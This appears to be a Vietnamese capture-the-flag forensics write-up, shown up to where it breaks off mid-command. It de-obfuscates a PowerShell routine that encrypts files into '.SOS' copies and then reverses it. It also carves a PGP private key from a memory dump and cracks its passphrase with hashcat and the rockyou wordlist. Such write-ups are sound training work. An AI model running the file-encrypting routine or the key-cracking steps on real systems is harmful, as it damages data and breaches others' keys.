-Message jnOFile not found!jnO break } YPMplainBytes',' ',' YPMae','athjnO } } End ','Path -ErrorAction SilentlyContinue if (!YPMFile.FullName) { ','hy.AesManage',' [System.IO.File]::WriteA','stem.','llBytes(YPMoutPath, YPMencryptedBytes) ','256Managed ','PMPath) { YPMFile = G','ography.SHA','28 ','eros ','function Encryption { [CmdletBinding',' [Parameter','= YPMFile.LastWriteTim',' = 1',' YPMaesManaged.Dispo',' YPMaesManag','Type([string])] Pa','Security.Crypt','aged = New-Object Sy','et-Item -Path YP','.IV + YPMencrypt','aged.CreateEncrypto',' (Get-Item YPMoutPath).LastWriteTime ',' YPMaesManaged.KeySize = 256 } Process { YPMaesManaged.Key = YPMshaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes(EOkYPMencryptedByte')).rePlace(([cHaR]69+[cHaR]79+[cHaR]107),[STRInG][cHaR]39).rePlace(([cHaR]106+[cHaR]110+[cHaR]79),[STRInG][cHaR]34).rePlace(([cHaR]89+[cHaR]80+[cHaR]77),[STRInG][cHaR]36) ) ``` + Đến đây thì mình hiểu được iEX <=> echo nên mình thực thi đoạn code trên để lấy đoạn code gốc : ``` echo ((("{40}{19}{25}{46}{15}{11}{41}{20}{14}{48}{33}{47}{37}{35}{2}{1}{31}{23}{18}{8}{45}{9}{39}{28}{24}{43}{38}{27}{53}{13}{36}{49}{16}{30}{17}{26}{21}{12}{0}{51}{4}{6}{10}{50}{5}{32}{34}{52}{42}{22}{29}{3}{44}{7}"-f ' } YPMencryptor = YPMaesMan','aged = New-Object System.Security.Cryptograp',' YPMaesMan','{ YPMshaManaged.Dispose() ','r() YPMencryptedBytes = YPMencryptor.TransformFinal','edBytes YPMaesManaged.Dispose() if (YPMPath) { ','Block(YPMplainBytes, 0, YPMplainBytes.Length) YPMen','se() } }','raphy.CipherMode]::CBC ','ed.Padding = [System.Security.Cryptography.PaddingMode]::Z','cryptedBytes = YPMaesManaged','m (','::ReadAllBytes(YPMFile.FullName) YPMoutPath = YPMFile.FullName + jnO.SOSjnO ','sEOk)) if (Y','arameterSetName = jnOCryptFilejnO)] [String]YPMPath ) Begin { YPMshaMan','ra','M',' ','ystem.Security.Cryptog','()] [Outpu','(Mandatory = YPMtrue, P',' = [System.IO.File]','e return jnOFile encrypted to YPMoutP','d YPMaesManaged.Mode = [S','sManaged.BlockSize','t',' Write-Error -Message jnOFile not found!jnO break } YPMplainBytes',' ',' YPMae','athjnO } } End ','Path -ErrorAction SilentlyContinue if (!YPMFile.FullName) { ','hy.AesManage',' [System.IO.File]::WriteA','stem.','llBytes(YPMoutPath, YPMencryptedBytes) ','256Managed ','PMPath) { YPMFile = G','ography.SHA','28 ','eros ','function Encryption { [CmdletBinding',' [Parameter','= YPMFile.LastWriteTim',' = 1',' YPMaesManaged.Dispo',' YPMaesManag','Type([string])] Pa','Security.Crypt','aged = New-Object Sy','et-Item -Path YP','.IV + YPMencrypt','aged.CreateEncrypto',' (Get-Item YPMoutPath).LastWriteTime ',' YPMaesManaged.KeySize = 256 } Process { YPMaesManaged.Key = YPMshaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes(EOkYPMencryptedByte')).rePlace(([cHaR]69+[cHaR]79+[cHaR]107),[STRInG][cHaR]39).rePlace(([cHaR]106+[cHaR]110+[cHaR]79),[STRInG][cHaR]34).rePlace(([cHaR]89+[cHaR]80+[cHaR]77),[STRInG][cHaR]36) ) ``` + => mình nhận được đoạn code gốc : ``` function Encryption { [CmdletBinding()] [OutputType([string])] Param ( [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")] [String]$Path ) Begin { $shaManaged = New-Object System.Security.Cryptography.SHA256Managed $aesManaged = New-Object System.Security.Cryptography.AesManaged $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 } Process { $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes('$encryptedBytes')) if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { Write-Error -Message "File not found!" break } $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName + ".SOS" } $encryptor = $aesManaged.CreateEncryptor() $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length) $encryptedBytes = $aesManaged.IV + $encryptedBytes $aesManaged.Dispose() if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime return "File encrypted to $outPath" } } End { $shaManaged.Dispose() $aesManaged.Dispose() } } ``` + Phân tích nó thì nhận thấy đây cũng là mã hóa AES_CBC 256 với key là sha256 của `$encryptedBytes` với file có đuôi ".SOS" là IV + Ciphertext ($encryptedBytes = $aesManaged.IV + $encryptedBytes) => IV sẽ là 16 bytes đầu của file ".SOS" và ciphertext là phần còn lại. Cộng thêm file mình nghi ngờ lúc nãy là `T3C4U.SOS` thì 90% là nó là file đã bị mã hóa rồi. Với việc nó bị chuyển thành file có tên là `recycle.bin` thì sau khi tìm kiếm 1 lúc mình thấy nó nằm ở path `"home/kalililinux/Desktop"` + Đến đây thì mình viết đoạn code để decrypt file recycle.bin lại : ``` from Crypto.Cipher import AES from hashlib import sha256 data = open('recycle.bin', 'rb').read() key = sha256(b'$encryptedBytes').digest() iv, ct = data[:16], data[16:] aes = AES.new(key, AES.MODE_CBC, iv) open('decrypted.bin', 'wb').write(aes.decrypt(ct)) ``` + Chạy đoạn script trên mình nhận được file decrypt.bin + Sau khi đã decrypt xong thì còn 1 lớp nữa đó là gpg. + Như đã phân tích trước đó thì chúng ta có 3 khóa định danh là Cocainit, VNvodich, Siuuuuuu.Author đã dùng khóa `VNvodich` để mã hóa file `RestrictedAccess.pdf` + Vì vậy điều cần làm là ta dùng gpg để decrypt file bin kia lấy lại file pdf đã bị mã hóa. + Và thư mục .gnupg nằm ở home/kalilinux. Đây là thư mục chứa 3 key đã tạo cùng với 5 private key đã được tạo ngẫu nhiên trước đó dùng để decrypt gpg. + Copy thư mục này vào trong thư mục .gnupg của máy ảo dùng để decrypt. + Ở đây mình dùng root để decrypt nên sẽ làm như sau : ``` $cd / $sudo su $cd /root/.gnupg $cp -r /mnt/c/Users/ASUS/Downloads/1/layer2/home/kalilinux/.gnupg/ /root/.gnupg/ $gpg --list-key(check các key đã được tạo) /root/.gnupg/pubring.kbx ------------------------ pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12] B719E23BEED6B02C76494DB43AE26A2802699708 uid [ultimate] Cocainit sub rsa3072 2023-01-13 [E] pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12] 5295D629A12B0703063559ED1E9F58A43C01EDBB uid [ultimate] VNvodich sub rsa3072 2023-01-13 [E] pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12] BD3EF2F8AFFDCC3A933E33E756EEDD86FA3AEBB6 uid [ultimate] Siuuuuuu sub rsa3072 2023-01-13 [E] $mv /mnt/c/Users/ASUS/Downloads/1/layer2/decrypt.bin /root/.gnupg $ls -la -rwxrwxrwx 1 khoanguyen khoanguyen 73216 Jan 11 12:29 decrypted.bin drwxr-xr-x 2 root root 4096 Jan 11 13:02 openpgp-revocs.d drwxr-x--- 2 root root 4096 Jan 11 13:02 private-keys-v1.d -rwxr-xr-x 1 root root 5768 Jan 11 13:02 pubring.kbx -rwxr-xr-x 1 root root 3856 Jan 11 13:02 pubring.kbx~ -rwxr-xr-x 1 root root 600 Jan 11 13:02 random_seed -rwxr-xr-x 1 root root 1440 Jan 11 13:02 trustdb.gpg $gpg --decrypt decrypt.bin > file 1.pdf $mv /root/.gnupg /mnt/c/Users/ASUS/Downloads/1/layer2/ ``` + Đến đây thì ta chỉ cần mở file pdf lên và thấy đc flag  ## Pretty Good Prank ### Des :  ### Sol : + Bài này cung cấp cho ta 1 file memory. + Dùng plugin banner của vol3 để kiểm tra version của nó.  ``` 0x43c001a0 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174) 0x44b96dd4 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174) 0x45231608 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174) 0x5c500010 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174) ``` + Đây là bản Linux version [5.4.0-107-generic(Ubuntu18.04)](https://drive.google.com/file/d/1VW70JyQSTD6bkyagsGDn8lW1ZDnSyxh0/view) + Mình tiến hành build profile cho nó dựa theo [URL này](https://beguier.eu/nicolas/articles/security-tips-3-volatility-linux-profiles.html) ``` $git clone https://github.com/volatilityfoundation/volatility.git $cd volatility/tools/linux/ => Đặt tên cho Makefile : `KVER ?= 5.4.0-107-generic` $docker run -it --rm -v $PWD:/volatility ubuntu:18.04 /bin/bash $apt update && apt install -y linux-image-5.4.0-107-generic linux-headers-5.4.0-107-generic build-essential dwarfdump make zip $cd volatility/ $make $zip Ubuntu1804.zip module.dwarf System.map-5.4.0-107-generic $exit $cp Ubuntu1804.zip <volatility>/plugins/overlays/linux/ $python2 vol.py --info | grep "Profile" ```  + Sau khi build profile xong thì mình tiến hành phân tích nó thôi : + Sử dụng plugin linux_bash để xem các quá trình đã xảy ra : `python2 vol.py -f PrettyGoodPrank.bin --profile=LinuxUbuntu1804x64 linux_bash`  + Quan sát những lệnh mà author đã dùng thì chủ yếu vẫn là dùng gpg mã hóa file `Cirt.pdf` với khóa định danh là `hackerlor` nhưng nó đã bị xóa đi. + Đến đây thì dữ liệu quan trọng là file `Cirt.pdf` + Mình `strings PrettyGoodPrank.bin | grep "Cirt.pdf"` + => Phát hiện được đường link để tải file Cirt.pdf.pgp đã bị mã hóa. + Đến đây thì mình sẽ tìm kiếm khóa định danh kia với keyword là `PGP Private`  ``` -----BEGIN PGP PRIVATE KEY BLOCK----- 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 IDcufsWUUAptvV8PmQ== =LIOj -----END PGP PRIVATE KEY BLOCK----- ``` + Đến đây thì mình dùng gpg2john để lấy hash và dùng hash cat để crack hoặc dùng [link online](https://hashes.com/en/johntheripper/gpg2john) này để lấy hash. ``` $gpg$*1*988*3072*a624c2bad5a9e46bef3aece49a6c3f464f33c0f57372f04d2f760ffe92ff226ad19a35fd3d2688c15e96758883c71a352da3ccf090dcc2c8aec534468c8a2596713b48f47ada2135b1c232866bba89ae504f68a8932d4ce72c60228063a88d19a77b7bfd13ded90974fc750cbaf120fa0b91af2d8cb04c835f092ba10a8c8e513b6425f04b89239323a535680a4a46c6a356f8a19ae36a2f9c81f8a592fcb181d04b48ff11ec60dece187c76bde131aa9f7b72616a744c3091cbb0791112bc243a2a7c17197ba7f030a60dbb3679528b3e56a09e8f9c9dade35e795a5d558c07d4a796528c882ab127f3e406cc4f9cba9a646abbf50b336c9fd4a29c7ee630b9bd41deb742f4cf853e6ba88c576354becc3705a928c9fbfb26122ddc665229bee0af9773fb9e8aa06e31f4e5fa2b1091b7ad9ba080c0bb577f7e5f4048d3803019d87a753773660b5d79dca5055c17c9217ee4a3faed1d0fe903548ef1a0dfe977a71ebf6d0b1043f2848f197f34f2ad91b60d7a4e6f0e760206692cb6937fe617ce1f129e4efc86a4e1bdbc5eff5b590a6e5d81e365810e88a570d24cf507da2c7249100304b592e9e6a5b3671cfefc22ab3407ef5f8cd9a13e61bf70cfb985d5db53199b50aec28163d093be39abfb9cea40d369b4c01902ec601d6fd390054cacebc488b7b84bb24da11c6a1f212bb9b9116a889220198dc1a354f8f27216a2a63a7ea1008391b6fd5be709f7248502aa9290a9a4ed7dc37557a36d97957580d17d50cb6e1186a705bc0031ed3dfd7755e05d0a53a316915993c093f874a128f47472c29d413315bda9078941059642988889ab14425ab9e3a1d57ca0a1d68b4d83328bbb02dfbf9133f9819b95b008768d3240d27e1a6721e1d08054a55f2886ae1b7e158972d45e0292906f7010e57510b3e04b2539acf5f68ae174111edaa6eca3fec4f9619eb8563c0f03288d573748c7bfd86e5e4c609b79427015196f225f4829616979424836525151ef242171fb0eaee69bfaab591a65f8fefe48384f4d45cfc23790d10bca591c60365f0c332ff3ebf60fbec480f64523d6f5ec6708b58f54ce159abb26c929292002885e4c20f5bdfe7346c01b1e9f9667469337f78973bbf0519bcd5d015eebb5192c595f4a9c39d2714f3a2277bfa37cb3e4ce3936c9f5e6fc194b859a8c0d753c0072839ba0af03cdc1e0f48195f9adc9d90078cf61c7b4207d331c35026b0ff07f7fd07cab806ff4e7dde4afc6f9dcd009145c4c6c5ad7365aa2850bdc5e632b19365469e8d73d1b26c9e9744415f6a930cc624a58102def6ad79c9e7b5c374800e2befe4b241967016b79c893defcf6c4099d19907dc92cba7868fe0c342ece9a690ab82e23b1fa70e15d59d2*3*254*2*7*16*ac728fc581d899a012e009ab8d5ac6dd*65011712*43181e058f99d001 ``` + Dùng hashcat để crack : ``` # hashcat -m 17010 result.txt -a 0 /usr/share/wordlists/rockyou.txt --force hashcat (v6.2.6) starting You have enabled --force to bypass dangerous warnings and errors! This can hide serious problems and should only be done when debugging. Do not report hashcat issues encountered when using --force. OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project] ==================================================================================================================================== * Device #1: pthread-0x000, 2912/5889 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 1 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec $gpg$*1*988*3072*a624c2bad5a9e46bef3aece49a6c3f464f33c0f57372f04d2f760ffe92ff226ad19a35fd3d2688c15e96758883c71a352da3ccf090dcc2c8aec534468c8a2596713b48f47ada2135b1c232866bba89ae504f68a8932d4ce72c60228063a88d19a77b7bfd13ded90974fc750cbaf120fa0b91af2d8cb04c835f092ba10a8c8e513b6425f04b89239323a535680a4a46c6a356f8a19ae36a2f9c81f8a592fcb181d04b48ff11ec60dece187c76bde131aa9f7b72616a744c3091cbb0791112bc243a2a7c17197ba7f030a60dbb3679528b3e56a09e8f9c9dade35e795a5d558c07d4a796528c882ab127f3e406cc4f9cba9a646abbf50b336c9fd4a29c7ee630b9bd41deb742f4cf853e6ba88c576354becc3705a928c9fbfb26122ddc665229bee0af9773fb9e8aa06e31f4e5fa2b1091b7ad9ba080c0bb577f7e5f4048d3803019d87a753773660b5d79dca5055c17c9217ee4a3faed1d0fe903548ef1a0dfe977a71ebf6d0b1043f2848f197f34f2ad91b60d7a4e6f0e760206692cb6937fe617ce1f129e4efc86a4e1bdbc5eff5b590a6e5d81e365810e88a570d24cf507da2c7249100304b592e9e6a5b3671cfefc22ab3407ef5f8cd9a13e61bf70cfb985d5db53199b50aec28163d093be39abfb9cea40d369b4c01902ec601d6fd390054cacebc488b7b84bb24da11c6a1f212bb9b9116a889220198dc1a354f8f27216a2a63a7ea1008391b6fd5be709f7248502aa9290a9a4ed7dc37557a36d97957580d17d50cb6e1186a705bc0031ed3dfd7755e05d0a53a316915993c093f874a128f47472c29d413315bda9078941059642988889ab14425ab9e3a1d57ca0a1d68b4d83328bbb02dfbf9133f9819b95b008768d3240d27e1a6721e1d08054a55f2886ae1b7e158972d45e0292906f7010e57510b3e04b2539acf5f68ae174111edaa6eca3fec4f9619eb8563c0f03288d573748c7bfd86e5e4c609b79427015196f225f4829616979424836525151ef242171fb0eaee69bfaab591a65f8fefe48384f4d45cfc23790d10bca591c60365f0c332ff3ebf60fbec480f64523d6f5ec6708b58f54ce159abb26c929292002885e4c20f5bdfe7346c01b1e9f9667469337f78973bbf0519bcd5d015eebb5192c595f4a9c39d2714f3a2277bfa37cb3e4ce3936c9f5e6fc194b859a8c0d753c0072839ba0af03cdc1e0f48195f9adc9d90078cf61c7b4207d331c35026b0ff07f7fd07cab806ff4e7dde4afc6f9dcd009145c4c6c5ad7365aa2850bdc5e632b19365469e8d73d1b26c9e9744415f6a930cc624a58102def6ad79c9e7b5c374800e2befe4b241967016b79c893defcf6c4099d19907dc92cba7868fe0c342ece9a690ab82e23b1fa70e15d59d2*3*254*2*7*16*ac728fc581d899a012e009ab8d5ac6dd*65011712*43181e058f99d001:itachi Session..........: hashcat Status...........: Cracked Hash.Mode........: 17010 (GPG (AES-128/AES-256 (SHA-1($pass)))) Hash.Target......: $gpg$*1*988*3072*a624c2bad5a9e46bef3aece49a6c3f464f...99d001 Time.Started.....: Sat Jan 21 22:39:02 2023, (1 min, 36 secs) Time.Estimated...: Sat Jan 21 22:40:38 2023, (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 43 H/s (6.03ms) @ Accel:512 Loops:8192 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 4096/14344385 (0.03%) Rejected.........: 0/4096 (0.00%) Restore.Point....: 2048/14344385 (0.01%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: slimshady -> oooooo ``` + Đến đây thì mình đã có được pass là `itachi` + Bây giờ chỉ cần import khóa định danh kia xong dùng pgp để decrypt file Cirt.pdf.pgp. ``` $pgp --import hash.txt $pgp --decrypt Cirt.pdf.pgp > Cirt.pdf ``` + Cuối cùng là nhập pass của file pdf là `itachi` để xem nội dung   ## HiddenGem Mixtape 3: The Ultimate Goal ### Des :  ### Sol : + Nối tiếp với `HiddenGem Mixtape 1` thì mình chuyển sang làm `HiddenGem Mixtape 3` cho dễ hơn vì cái 2 hơi khó =)). + Bài này vẫn lấy file từ phần 1 nhưng có thêm 1 file pcap nữa. + Mở wireshark lên phân tích file thì nhận thấy có khá nhiều protocol trong đấy. + Mình sẽ xem thử nó có những protocol nào bằng `Hierachy Statistics`  + Phân tích 1 lúc về các protocols như http/tcp, smb thì nhận thấy không có điểm gì đặc biệt + Sau đó mình nhận nó có RDP và DNS có điểm đáng ngờ + Lý do RDP có điểm đáng nghi ngờ là theo mô tả của để bài thì người phát hiện ra cuộc tấn công chỉ có dữ liệu ngắn trước khi tắt toàn bộ hệ thống vào khoảng 19h UTC tức là gần sát giờ có thể là trong khoảng 5->10p cuối nó vẫn còn khởi chạy. + Quan sát file pcap thì nhận thấy trong khoảng 18h53 -> 18h55 (UTC) có 6 gói RDP đang chạy. + Gói đầu :  + Gói cuối :  + *Note : 1. 01:53:05 (SE asia) <=> 18h53 UTC 2. 01.55.50 (SE asia) <=> 18h55 UTC + oke giờ mình phân tích DNS trước.  + Nhận thấy mấy mã b64 này có điểm gì đó rất đáng ngờ nên mình extract nó hết ra xong decode để xem có nhận được gì không. + Dùng tshark để extract, đặc điểm chung là `src == 192.168.209.134` && `dst == 172.21.20.96` && `Transaction ID == 0x0002` với trường dữ liệu lấy ra là dns.qry.name ``` $tshark -r HiddenGem.pcapng -T fields -e dns.qry.name "ip.src == 172.21.20.96 